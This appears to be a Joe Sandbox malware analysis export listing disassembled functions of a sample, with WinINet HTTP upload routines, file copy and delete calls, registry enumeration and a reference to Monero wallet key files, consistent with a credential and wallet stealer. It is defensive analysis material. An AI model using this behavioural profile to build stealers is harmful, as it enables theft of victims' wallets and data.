Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: c530f246e4e230971afa21e945fad8ca615736766fe119bad1003ca2c70df4ca
Instruction ID: 3f3fd85b4c78583a77c8b0fa7736eb9d53fce9c2c671cc2a18693e1fc8781673
Opcode Fuzzy Hash: c530f246e4e230971afa21e945fad8ca615736766fe119bad1003ca2c70df4ca
Instruction Fuzzy Hash: 5F32557192061CABDB66EBA0DC91FEE7778BF94700F408199F11A67091DF382A49CF52

Function 0036A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037AA70: StrCmpCA.SHLWAPI(01148FE8,0036A7A7,?,0036A7A7,01148FE8), ref: 0037AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0036AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0036ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036A8B0

Part of subcall function 0037A820: lstrlen.KERNEL32(00364F05,?,?,00364F05,00380DDE), ref: 0037A82B
Part of subcall function 0037A820: lstrcpy.KERNEL32(00380DDE,00000000), ref: 0037A885

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

lstrcat.KERNEL32(?,00000000), ref: 0036ACEB
lstrcat.KERNEL32(?,00381320), ref: 0036ACFA
lstrcat.KERNEL32(?,00000000), ref: 0036AD0D
lstrcat.KERNEL32(?,00381324), ref: 0036AD1C
lstrcat.KERNEL32(?,00000000), ref: 0036AD2F
lstrcat.KERNEL32(?,00381328), ref: 0036AD3E
lstrcat.KERNEL32(?,00000000), ref: 0036AD51
lstrcat.KERNEL32(?,0038132C), ref: 0036AD60
lstrcat.KERNEL32(?,00000000), ref: 0036AD73
lstrcat.KERNEL32(?,00381330), ref: 0036AD82
lstrcat.KERNEL32(?,00000000), ref: 0036AD95
lstrcat.KERNEL32(?,00381334), ref: 0036ADA4
lstrcat.KERNEL32(?,00000000), ref: 0036ADB7
lstrlen.KERNEL32(?), ref: 0036AE0D
lstrlen.KERNEL32(?), ref: 0036AE1C

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

DeleteFileA.KERNEL32(00000000), ref: 0036AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0036ABD4

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: fa9e34d7354b47b970f7c60e68ef545d0a4f803e44d585cd47265cea4737fe8d
Instruction ID: 901ca7dd7c530a0a99f679b2036bb75d1714ad76f9a1a5d985cce8e3829e02b1
Opcode Fuzzy Hash: fa9e34d7354b47b970f7c60e68ef545d0a4f803e44d585cd47265cea4737fe8d
Instruction Fuzzy Hash: 62122271910508ABCB16FBA0DD96EEE7778AF94301F508158F50BBA091DF386E09DB63

Function 00365960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
Part of subcall function 003647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003659F8
StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00365A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00365B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0114EBB8,00000000,?,0114A540,00000000,?,00381A1C), ref: 00365E71
lstrlen.KERNEL32(00000000), ref: 00365E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00365E93
RtlAllocateHeap.NTDLL(00000000), ref: 00365E9A
lstrlen.KERNEL32(00000000), ref: 00365EAF
lstrlen.KERNEL32(00000000), ref: 00365ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00365EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00365F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00365F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00365F4C
InternetCloseHandle.WININET(00000000), ref: 00365FB0
InternetCloseHandle.WININET(00000000), ref: 00365FBD
HttpOpenRequestA.WININET(00000000,0114EA68,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 00365BF8

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

InternetCloseHandle.WININET(00000000), ref: 00365FC7

Strings

", xrefs: 00365CD5
------, xrefs: 00365C0B
------, xrefs: 00365D4C
------, xrefs: 00365A96
", xrefs: 00365E16

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: f9f29b29ee821a29261686ba3afae5cf0120ef5c74f77f7dc0652096a4481638
Instruction ID: fb58aa7b80ee45d3466bba9e72f19d1ce986e7dab2d8960b9940efb971cdf51e
Opcode Fuzzy Hash: f9f29b29ee821a29261686ba3afae5cf0120ef5c74f77f7dc0652096a4481638
Instruction Fuzzy Hash: C7123271820518ABDB66EBA0DC95FEEB778BF54700F4081A9F10A66091DF742A4ACF52

Function 0036CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00378B60: GetSystemTime.KERNEL32(00380E1A,0114A480,003805AE,?,?,003613F9,?,0000001A,00380E1A,00000000,?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 00378B86

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0036D0CE
lstrcat.KERNEL32(?,00000000), ref: 0036D208
lstrcat.KERNEL32(?,00381478), ref: 0036D217
lstrcat.KERNEL32(?,00000000), ref: 0036D22A
lstrcat.KERNEL32(?,0038147C), ref: 0036D239
lstrcat.KERNEL32(?,00000000), ref: 0036D24C
lstrcat.KERNEL32(?,00381480), ref: 0036D25B
lstrcat.KERNEL32(?,00000000), ref: 0036D26E
lstrcat.KERNEL32(?,00381484), ref: 0036D27D
lstrcat.KERNEL32(?,00000000), ref: 0036D290
lstrcat.KERNEL32(?,00381488), ref: 0036D29F
lstrcat.KERNEL32(?,00000000), ref: 0036D2B2
lstrcat.KERNEL32(?,0038148C), ref: 0036D2C1
lstrcat.KERNEL32(?,00000000), ref: 0036D2D4
lstrcat.KERNEL32(?,00381490), ref: 0036D2E3

Part of subcall function 0037A820: lstrlen.KERNEL32(00364F05,?,?,00364F05,00380DDE), ref: 0037A82B
Part of subcall function 0037A820: lstrcpy.KERNEL32(00380DDE,00000000), ref: 0037A885

lstrlen.KERNEL32(?), ref: 0036D32A
lstrlen.KERNEL32(?), ref: 0036D339

Part of subcall function 0037AA70: StrCmpCA.SHLWAPI(01148FE8,0036A7A7,?,0036A7A7,01148FE8), ref: 0037AA8F

DeleteFileA.KERNEL32(00000000), ref: 0036D3B4

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: a1fd35b82faba1e6e681a207ebc34db9c6136ebd46e99c64336675da215981d1
Instruction ID: 4e388e01db2177702da1430427965f3c18d57faa7ee3414f903c4e54e808d7e2
Opcode Fuzzy Hash: a1fd35b82faba1e6e681a207ebc34db9c6136ebd46e99c64336675da215981d1
Instruction Fuzzy Hash: 8BE12171910509ABCB16FBA0DD96EEE7778BF54301F108158F10BBB091DF39AA09DB62

Function 00364880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
Part of subcall function 003647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00364915
StrCmpCA.SHLWAPI(?,0114EBA8), ref: 0036493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00364ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00380DDB,00000000,?,?,00000000,?,",00000000,?,0114EB28), ref: 00364DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00364E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00364E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00364E49
InternetCloseHandle.WININET(00000000), ref: 00364EAD
InternetCloseHandle.WININET(00000000), ref: 00364EC5
HttpOpenRequestA.WININET(00000000,0114EA68,?,0114DEE0,00000000,00000000,00400100,00000000), ref: 00364B15

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

InternetCloseHandle.WININET(00000000), ref: 00364ECF

Strings

------, xrefs: 00364B28
", xrefs: 00364D33
------, xrefs: 00364C69
------, xrefs: 003649BD
", xrefs: 00364BF2

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 630bec7a92b01a882f4f262a0afa2331f92e859b3b44978aa26122f8796b9c09
Instruction ID: 077096207600201ff0af5f6b01cd41aedaf0499bbed6426e7eae1c0206700e3e
Opcode Fuzzy Hash: 630bec7a92b01a882f4f262a0afa2331f92e859b3b44978aa26122f8796b9c09
Instruction Fuzzy Hash: 33124171910618AADB26EBA0DC92FEEB778BF55300F508199F11A76091DF342F49CF62

Function 00378320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

RegOpenKeyExA.KERNEL32(00000000,0114B488,00000000,00020019,00000000,003805B6), ref: 003783A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00378426
wsprintfA.USER32 ref: 00378459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0037847B
RegCloseKey.ADVAPI32(00000000), ref: 0037848C
RegCloseKey.ADVAPI32(00000000), ref: 00378499

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Strings

- , xrefs: 003785A3
%s\%s, xrefs: 0037844D
?, xrefs: 0037837A

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 581f65ef98ade74471c659d1c64cb8d42c5b31c6c6b38a51ffe35840d618e0ae
Instruction ID: 2875c21899535fc0b24953945ef917b905479b802041d880be3e7c32dfdfc5e2
Opcode Fuzzy Hash: 581f65ef98ade74471c659d1c64cb8d42c5b31c6c6b38a51ffe35840d618e0ae
Instruction Fuzzy Hash: 5F81FB7191021CABDB69DB64CC95FEE77B8BF58700F00C299E109A6140DF756A89CFA1

Function 00366280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364839
Part of subcall function 003647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364849

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

InternetOpenA.WININET(00380DFE,00000001,00000000,00000000,00000000), ref: 003662E1
StrCmpCA.SHLWAPI(?,0114EBA8), ref: 00366303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366335
